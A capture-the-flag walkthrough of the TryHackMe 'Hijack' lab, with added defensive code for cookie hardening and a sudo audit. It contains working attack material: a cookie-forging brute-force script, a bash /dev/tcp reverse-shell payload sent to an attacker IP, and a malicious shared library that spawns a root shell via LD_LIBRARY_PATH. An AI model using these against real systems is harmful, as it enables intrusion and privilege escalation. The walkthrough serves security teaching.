# Hijack

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FxoSu7sSd6IayAZFbTZdE%2FHijack.png?alt=media&#x26;token=0e7f045a-9137-4bc6-a593-b959cf339a0e" alt=""><figcaption></figcaption></figure>

<p align="center"><a href="https://tryhackme.com/room/hijack">https://tryhackme.com/room/hijack</a></p>

***

## Enumeration

```bash
sudo nmap -p- -sS --min-rate 5000 -Pn -n -vv -oA nmap/Hijack 10.66.133.141

PORT      STATE SERVICE REASON
21/tcp    open  ftp     syn-ack ttl 62
22/tcp    open  ssh     syn-ack ttl 62
80/tcp    open  http    syn-ack ttl 62
111/tcp   open  rpcbind syn-ack ttl 62
2049/tcp  open  nfs     syn-ack ttl 62
37973/tcp open  unknown syn-ack ttl 62
44893/tcp open  unknown syn-ack ttl 62
54423/tcp open  unknown syn-ack ttl 62
56053/tcp open  unknown syn-ack ttl 62
```

```bash
nmap -p 21,22,80,111,2049,37973,44893,54423,56053 -sCV -oA nmap/openPorts 10.66.133.141

PORT      STATE SERVICE  VERSION
21/tcp    open  ftp      vsftpd 3.0.3
22/tcp    open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94:ee:e5:23:de:79:6a:8d:63:f0:48:b8:62:d9:d7:ab (RSA)
|   256 42:e9:55:1b:d3:f2:04:b6:43:b2:56:a3:23:46:72:c7 (ECDSA)
|_  256 27:46:f6:54:44:98:43:2a:f0:59:ba:e3:b6:73:d3:90 (ED25519)
80/tcp    open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Home
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      42193/udp6  mountd
|   100005  1,2,3      45319/udp   mountd
|   100005  1,2,3      54423/tcp   mountd
|   100005  1,2,3      56232/tcp6  mountd
|   100021  1,3,4      33010/tcp6  nlockmgr
|   100021  1,3,4      37973/tcp   nlockmgr
|   100021  1,3,4      46429/udp6  nlockmgr
|   100021  1,3,4      51856/udp   nlockmgr
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
2049/tcp  open  nfs      2-4 (RPC #100003)
37973/tcp open  nlockmgr 1-4 (RPC #100021)
44893/tcp open  mountd   1-3 (RPC #100005)
54423/tcp open  mountd   1-3 (RPC #100005)
56053/tcp open  mountd   1-3 (RPC #100005)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

```bash
showmount -e 10.66.133.141

Export list for 10.66.133.141:
/mnt/share *
```

```bash
sudo mkdir /mnt/target
```

```bash
sudo mount -t nfs 10.66.133.141:/mnt/share /mnt/target
```

```bash
cd /mnt
ls -l
drwx------  2 1003 1003 4096 Aug  8  2023 target
```

The export is owned by UID 1003 and is mode 700, and NFS (AUTH_SYS) trusts the client's numeric IDs, so a local user with that UID can read it:

```bash
sudo useradd -u 1003 pwned
```

```bash
sudo -u pwned bash
```

```bash
cd target
ls
for_employees.txt
cat for_employees.txt 
ftp creds :

ftpuser:W3stV1rg1n14M0un741nM4m4
```

```bash
ftp 10.66.133.141
Connected to 10.66.133.141.
220 (vsFTPd 3.0.3)
Name (10.66.133.141:melvin): ftpuser
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode on.
ftp> ls -la
227 Entering Passive Mode (10,66,133,141,181,4).
150 Here comes the directory listing.
drwxr-xr-x    2 1002     1002         4096 Aug 08  2023 .
drwxr-xr-x    2 1002     1002         4096 Aug 08  2023 ..
-rwxr-xr-x    1 1002     1002          220 Aug 08  2023 .bash_logout
-rwxr-xr-x    1 1002     1002         3771 Aug 08  2023 .bashrc
-rw-r--r--    1 1002     1002          368 Aug 08  2023 .from_admin.txt
-rw-r--r--    1 1002     1002         3150 Aug 08  2023 .passwords_list.txt
-rwxr-xr-x    1 1002     1002          655 Aug 08  2023 .profile
226 Directory send OK.
ftp> prompt off
Interactive mode off.
ftp> mget .*
local: .bash_logout remote: .bash_logout
227 Entering Passive Mode (10,66,133,141,49,27).
150 Opening BINARY mode data connection for .bash_logout (220 bytes).
226 Transfer complete.
220 bytes received in 0.0007 seconds (329.4735 kbytes/s)
local: .bashrc remote: .bashrc
227 Entering Passive Mode (10,66,133,141,230,231).
150 Opening BINARY mode data connection for .bashrc (3771 bytes).
226 Transfer complete.
3771 bytes received in 0.0003 seconds (11.6692 Mbytes/s)
local: .from_admin.txt remote: .from_admin.txt
227 Entering Passive Mode (10,66,133,141,47,172).
150 Opening BINARY mode data connection for .from_admin.txt (368 bytes).
226 Transfer complete.
368 bytes received in 0.0009 seconds (404.8297 kbytes/s)
local: .passwords_list.txt remote: .passwords_list.txt
227 Entering Passive Mode (10,66,133,141,209,219).
150 Opening BINARY mode data connection for .passwords_list.txt (3150 bytes).
226 Transfer complete.
3150 bytes received in 0.0003 seconds (9.2129 Mbytes/s)
local: .profile remote: .profile
227 Entering Passive Mode (10,66,133,141,209,188).
150 Opening BINARY mode data connection for .profile (655 bytes).
226 Transfer complete.
655 bytes received in 0.0001 seconds (4.1716 Mbytes/s)
ftp> quit
221 Goodbye.
```

```bash
cat .from_admin.txt

To all employees, this is "admin" speaking,
i came up with a safe list of passwords that you all can use on the site, these passwords don't appear on any wordlist i tested so far, so i encourage you to use them, even me i'm using one of those.

NOTE To rick : good job on limiting login attempts, it works like a charm, this will prevent any future brute forcing.
```

<http://10.66.133.141/signup.php>

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FWP3PDQgduOuXJ65Q4RLm%2FScreenshot%202026-03-16%20195446.png?alt=media&#x26;token=4ebf5f9b-e726-4b9d-b039-6523d490c87f" alt=""><figcaption></figcaption></figure>

<http://10.66.133.141/login.php>

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FfYqVSAs9eWN0eJLPtvIu%2FScreenshot%202026-03-16%20195543.png?alt=media&#x26;token=8ea75c55-5e7c-4d69-ae01-e697e2a5b276" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2Fd4ogOvOH1ROrVMEUSADm%2FScreenshot%202026-03-16%20195759.png?alt=media&#x26;token=9f70775b-e0cb-4ee8-8107-c4e6b75cd9f9" alt=""><figcaption></figcaption></figure>

```bash
echo 'bWVsdmluOmRhYmQwMThmOTg0NzZjMWY2ZWIyZjIzZThkOWI4OTIw' | base64 -d; echo
melvin:dabd018f98476c1f6eb2f23e8d9b8920
```

```bash
echo -n "melvin" | md5sum
dabd018f98476c1f6eb2f23e8d9b8920  -
```

`bf.py`

```python
import hashlib
import base64
import requests
import argparse

def make_cookie(password: str) -> str:
    # The site issues PHPSESSID = base64("<user>:" + md5(<password>)), so a
    # candidate admin cookie can be built offline. Nothing is sent to login.php,
    # so its login-attempt limit never fires.
    md5 = hashlib.md5(password.encode()).hexdigest().encode()
    return base64.b64encode(b'admin:' + md5).decode()

def main():
    parser = argparse.ArgumentParser(description="Cookie-based password bruteforcer")
    parser.add_argument("ip", help="Target IP address")
    parser.add_argument("wordlist", help="Path to password list")
    args = parser.parse_args()

    url = f"http://{args.ip}/administration.php"

    with open(args.wordlist) as f:
        passwords = [line.strip() for line in f if line.strip()]

    # Response size of an unauthenticated request; a valid admin cookie
    # returns the full administration page, which is noticeably larger.
    baseline = len(requests.get(url, timeout=10).text)
    print(f"[*] Target: {url}")
    print(f"[*] Testing {len(passwords)} passwords...\n")

    for i, password in enumerate(passwords, 1):
        cookie = make_cookie(password)
        r = requests.get(url, cookies={"PHPSESSID": cookie}, timeout=10)

        print(f"[{i}/{len(passwords)}] Trying: {password}")

        if len(r.text) > baseline:
            print(f"\n[+] PASSWORD FOUND: {password}")
            print(f"[+] Cookie: PHPSESSID={cookie}")
            print(f"[+] Content length: {len(r.text)} (baseline: {baseline})")
            break
    else:
        print("\n[-] Password not found in list.")

if __name__ == "__main__":
    main()
```

```bash
python3 bf.py 10.66.133.141 passwords.txt 

[*] Target: http://10.66.133.141/administration.php
[*] Testing 150 passwords...

[1/150] Trying: Vxb38mSNN8wxqHxv6uMX
<SNIP>
[82/150] Trying: uDh3jCQsdcuLhjVkAy5x

[+] PASSWORD FOUND: uDh3jCQsdcuLhjVkAy5x
[+] Cookie: PHPSESSID=YWRtaW46ZDY1NzNlZDczOWFlN2ZkZmIzY2VkMTk3ZDk0ODIwYTU=
[+] Content length: 864 (baseline: 51)
```
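Why the brute force worked and what the fix looks like, as an added example that is not part of the original writeup or the room's code: the first half reimplements the observed scheme (base64 of `user:md5(password)`) and shows that a captured or forged cookie can be attacked entirely offline, so the login-attempt limit rick added to login.php never sees an attempt; the second half is one hardened design, a random server-side session id with the cookie flags nmap reported missing. The `hunter2` password, the `SessionStore` class and the function names are illustrative assumptions.

```python
import base64
import hashlib
import secrets
from typing import Dict, List, Optional, Tuple

# --- The scheme observed on Hijack: PHPSESSID = base64("<user>:" + md5(<password>)) ---

def make_weak_cookie(user: str, password: str) -> str:
    """Build a cookie the way the site does; nothing here needs the server."""
    digest = hashlib.md5(password.encode()).hexdigest()
    return base64.b64encode(f"{user}:{digest}".encode()).decode()

def parse_weak_cookie(cookie: str) -> Tuple[str, str]:
    """Split a captured cookie back into (user, md5(password))."""
    user, digest = base64.b64decode(cookie).decode().split(":", 1)
    return user, digest

def crack_weak_cookie(cookie: str, candidates: List[str]) -> Optional[str]:
    """Offline guess against the embedded hash: no HTTP request is made, so a
    rate limit on the login form cannot slow this down."""
    _, digest = parse_weak_cookie(cookie)
    for pw in candidates:
        if hashlib.md5(pw.encode()).hexdigest() == digest:
            return pw
    return None

# --- Hardened replacement: the cookie is a random capability, resolved server-side ---

class SessionStore:
    """Maps sha256(token) -> user. Storing the hash means a leaked store does not
    hand out usable cookies, and the token carries no password material at all."""

    def __init__(self) -> None:
        self._sessions: Dict[str, str] = {}

    @staticmethod
    def _key(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, user: str) -> str:
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG; not derivable offline
        self._sessions[self._key(token)] = user
        return token

    def resolve(self, token: str) -> Optional[str]:
        return self._sessions.get(self._key(token))

    def revoke(self, token: str) -> None:
        self._sessions.pop(self._key(token), None)

def set_cookie_header(token: str) -> str:
    """nmap flagged PHPSESSID without HttpOnly; the hardened cookie sets the flags."""
    return f"Set-Cookie: PHPSESSID={token}; Path=/; HttpOnly; Secure; SameSite=Lax"

if __name__ == "__main__":
    captured = "bWVsdmluOmRhYmQwMThmOTg0NzZjMWY2ZWIyZjIzZThkOWI4OTIw"  # cookie from the page
    print("captured cookie decodes to", parse_weak_cookie(captured))
    forged = make_weak_cookie("admin", "hunter2")  # constructed example password
    print("offline crack:", crack_weak_cookie(forged, ["letmein", "hunter2"]))
    store = SessionStore()
    token = store.issue("admin")
    print(set_cookie_header(token))
    print("resolves to", store.resolve(token), "; tampered:", store.resolve(token + "x"))
```

The weak scheme is also why `signup.php` with username `melvin` and password `melvin` produced a cookie the attacker could read: the cookie is the credential, not a reference to a server-side session.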

<http://10.66.133.141/administration.php>

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FZS8kiY9ZnrFYCjb4wIcN%2FScreenshot%202026-03-16%20201027.png?alt=media&#x26;token=ec64fa7d-65a4-4db6-9736-5aeb3c6d84fd" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FvlfrQyz8hbFJtUvAAbyC%2FScreenshot%202026-03-16%20202736.png?alt=media&#x26;token=f289da67-32ed-4098-9de8-99e4d6723f49" alt=""><figcaption></figcaption></figure>

```bash
nc -lnvp 1111
Listening on 0.0.0.0 1111
```

Reverse-shell payload sent through the administration page, URL-encoded for the request (`+` for space, `%26` for `&`); decoded it is `bash -c 'bash -i >& /dev/tcp/192.168.192.129/1111 0>&1'`, with 192.168.192.129 being the attacking host:

```bash
bash+-c+'bash+-i+>%26+/dev/tcp/192.168.192.129/1111+0>%261'
```

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FQ89jA2TTZcXYep1UMoUd%2FScreenshot%202026-03-16%20202833.png?alt=media&#x26;token=05cb873b-308d-4047-841d-0664db3c0377" alt=""><figcaption></figcaption></figure>

```bash
nc -lnvp 1111

Listening on 0.0.0.0 1111
Connection received on 10.66.133.141 38552
bash: cannot set terminal process group (1229): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Hijack:/var/www/html$
```

[interactive-shell](https://estebanzarate.gitbook.io/hackache/linux/interactive-shell "mention")

## Lateral movement

```bash
www-data@Hijack:/var/www/html$ ls -la

total 48
drwxr-xr-x 2 www-data www-data 4096 Aug  8  2023 .
drwxr-xr-x 3 root     root     4096 Aug  8  2023 ..
-rw-rw-r-- 1 www-data www-data 2062 Jul 12  2023 administration.php
-rw-rw-r-- 1 www-data www-data  307 Jun 23  2023 config.php
-rw-rw-r-- 1 www-data www-data 1272 Jul 12  2023 index.php
-rw-rw-r-- 1 www-data www-data 5957 Jul 12  2023 login.php
-rw-rw-r-- 1 www-data www-data  220 Jun 23  2023 logout.php
-rw-rw-r-- 1 www-data www-data  440 Jun 23  2023 navbar.php
-rw-rw-r-- 1 www-data www-data   88 Jun 23  2023 service_status.sh
-rw-rw-r-- 1 www-data www-data 3066 Jun 23  2023 signup.php
-rw-rw-r-- 1 www-data www-data 1916 Jun 23  2023 style.css
```

```bash
www-data@Hijack:/var/www/html$ cat config.php 

<?php
$servername = "localhost";
$username = "rick";
$password = "N3v3rG0nn4G1v3Y0uUp";
$dbname = "hijack";

// Create connection
$mysqli = new mysqli($servername, $username, $password, $dbname);

// Check connection
if ($mysqli->connect_error) {
  die("Connection failed: " . $mysqli->connect_error);
}
?>
```

```bash
www-data@Hijack:/var/www/html$ su rick
Password: 
rick@Hijack:/var/www/html$
```

```bash
rick@Hijack:/var/www/html$ cd
rick@Hijack:~$ ls
user.txt
rick@Hijack:~$ cat user.txt
```

## User flag

{% hint style="success" %}
THM\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*36}
{% endhint %}

## Privilege escalation

```bash
rick@Hijack:~$ sudo -l
[sudo] password for rick: 
Matching Defaults entries for rick on Hijack:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_LIBRARY_PATH

User rick may run the following commands on Hijack:
    (root) /usr/sbin/apache2 -f /etc/apache2/apache2.conf -d /etc/apache2
```

```bash
rick@Hijack:~$ ldd /usr/sbin/apache2

	linux-vdso.so.1 =>  (0x00007ffee53e3000)
	libpcre.so.3 => /lib/x86_64-linux-gnu/libpcre.so.3 (0x00007fded3a41000)
	libaprutil-1.so.0 => /usr/lib/x86_64-linux-gnu/libaprutil-1.so.0 (0x00007fded381a000)
	libapr-1.so.0 => /usr/lib/x86_64-linux-gnu/libapr-1.so.0 (0x00007fded35e8000)
	libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007fded33cb000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fded3001000)
	libcrypt.so.1 => /lib/x86_64-linux-gnu/libcrypt.so.1 (0x00007fded2dc9000)
	libexpat.so.1 => /lib/x86_64-linux-gnu/libexpat.so.1 (0x00007fded2ba0000)
	libuuid.so.1 => /lib/x86_64-linux-gnu/libuuid.so.1 (0x00007fded299b000)
	libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fded2797000)
	/lib64/ld-linux-x86-64.so.2 (0x00007fded3f56000)
```

sudo keeps `LD_LIBRARY_PATH` (`env_keep+=LD_LIBRARY_PATH`), so a directory we control is searched for apache2's libraries before the system paths; any library on the `ldd` list can be shadowed, here `libcrypt.so.1`. The fake library only needs a constructor, which the loader runs as root before apache2's `main()`.

`libcrypt.so.1.c`

```c
#include <stdio.h>
#include <stdlib.h>

/* Runs when the loader maps this library into the sudo'd apache2 process. */
static void __attribute__((constructor)) pwn() {
	/* Drop the variable first, so the shell and anything it spawns that links
	   libcrypt do not load this library again and recurse. */
	unsetenv("LD_LIBRARY_PATH");
	system("/bin/bash -p");
}
```

```bash
rick@Hijack:/tmp$ gcc -shared -fPIC -o /tmp/libcrypt.so.1 /tmp/libcrypt.so.1.c
```

```bash
rick@Hijack:/tmp$ sudo LD_LIBRARY_PATH=/tmp /usr/sbin/apache2 -f /etc/apache2/apache2.conf -d /etc/apache2
```
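A check for the sudo misconfiguration used above, as an added example that is not from the original writeup: it parses `sudo -l` output for loader-controlling variables that `env_keep` preserves (sudo strips `LD_*` by default; `secure_path` only restricts where commands are found, not which libraries they load) and lists the root-runnable commands whose libraries could be shadowed. The embedded sample is the `sudo -l` output from this page; the `audit`/`shared_libs` names are my own, and `shared_libs` only runs `ldd` when the binary exists on the host.

```python
import os
import re
import shutil
import subprocess
from typing import Dict, List

# Sample input: the `sudo -l` output captured as rick on Hijack, embedded so this runs offline.
SUDO_L_SAMPLE = r"""Matching Defaults entries for rick on Hijack:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_LIBRARY_PATH

User rick may run the following commands on Hijack:
    (root) /usr/sbin/apache2 -f /etc/apache2/apache2.conf -d /etc/apache2
"""

# Variables that steer the dynamic loader of whatever sudo executes; sudo drops
# them unless env_keep says otherwise.
LOADER_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT"}

def kept_loader_vars(sudo_l: str) -> List[str]:
    """Loader variables that env_keep preserves, from `env_keep+=X` or `env_keep+="X Y"`."""
    kept = set()
    for m in re.finditer(r'env_keep\+?=(?:"([^"]*)"|([^,\s]+))', sudo_l):
        for name in re.split(r"[\s,]+", (m.group(1) or m.group(2)).strip()):
            if name in LOADER_VARS:
                kept.add(name)
    return sorted(kept)

# "(root) [TAG: ...] command" or "(ALL : ALL) command"; tags such as NOPASSWD: are group 2.
_RULE = re.compile(r"\s*\((root|ALL)(?:\s*:\s*[^)]*)?\)\s*((?:[A-Z]+:\s*)*)(.*)")

def root_commands(sudo_l: str) -> List[str]:
    """Commands runnable as root, with tags such as NOPASSWD: stripped."""
    cmds = []
    for line in sudo_l.splitlines():
        m = _RULE.match(line)
        if m and m.group(3).strip():
            cmds.append(m.group(3).strip())
    return cmds

def shared_libs(binary: str) -> List[str]:
    """Libraries the binary resolves at load time; each can be shadowed by a
    directory placed in LD_LIBRARY_PATH. Empty when the binary or ldd is absent."""
    if not os.path.exists(binary) or shutil.which("ldd") is None:
        return []
    out = subprocess.run(["ldd", binary], capture_output=True, text=True).stdout
    return [line.split()[0] for line in out.splitlines() if "=>" in line]

def audit(sudo_l: str) -> Dict[str, object]:
    kept = kept_loader_vars(sudo_l)
    cmds = root_commands(sudo_l)
    return {
        "kept": kept,
        "commands": cmds,
        # Both are needed: a preserved loader variable and something to run as root.
        "hijackable": bool(kept) and bool(cmds),
    }

if __name__ == "__main__":
    result = audit(SUDO_L_SAMPLE)
    if result["hijackable"]:
        print("[!] sudo preserves:", ", ".join(result["kept"]))
        for cmd in result["commands"]:
            print(f"[!] root command: {cmd}")
            for lib in shared_libs(cmd.split()[0]):
                print(f"      shadowable: {lib}")
    else:
        print("[+] no loader variable survives sudo")
```

On a live host, feed it the real output (`audit(subprocess.run(["sudo", "-l"], capture_output=True, text=True).stdout)`); the fix on the target side is simply removing `LD_LIBRARY_PATH` from `env_keep`.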

```bash
root@Hijack:~# cd /root
root@Hijack:/root# ls
root.txt
root@Hijack:/root# cat root.txt 

██╗░░██╗██╗░░░░░██╗░█████╗░░█████╗░██╗░░██╗
██║░░██║██║░░░░░██║██╔══██╗██╔══██╗██║░██╔╝
███████║██║░░░░░██║███████║██║░░╚═╝█████═╝░
██╔══██║██║██╗░░██║██╔══██║██║░░██╗██╔═██╗░
██║░░██║██║╚█████╔╝██║░░██║╚█████╔╝██║░╚██╗
╚═╝░░╚═╝╚═╝░╚════╝░╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝
```

## Root flag

{% hint style="success" %}
THM\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*5a}
{% endhint %}
